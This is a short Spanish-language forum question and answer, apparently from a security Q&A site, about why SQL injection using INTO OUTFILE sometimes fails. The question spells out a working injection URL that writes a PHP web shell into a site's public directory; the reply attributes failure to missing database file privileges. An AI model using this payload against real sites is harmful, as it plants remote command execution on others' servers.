¿Por qué la técnica de Inyección de SQL INTO OUTFILE a veces no funciona? [cerrado]

Navega tus respuestas
0

¿Por qué la técnica de inyección SQL INTO OUTFILE a veces no funciona?

http://example.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"

¿Hay alguna solución para esto cuando no es así?

    
pregunta Sec Researcher 27.09.2015 - 02:35
fuente

1 respuesta

3

Depende de los privilegios que tenga el dbuser. Si no hay privilegio de archivo, en outfile simplemente no funciona. No hay bypass para eso.

    
respondido por el whuuuu 27.09.2015 - 04:05
fuente

Lea otras preguntas en las etiquetas

Proxy de Socks5: ¿Peligro de MITM inyección maliciosa wget / httrack? ¿Analizar manualmente la infección de archivos maliciosos?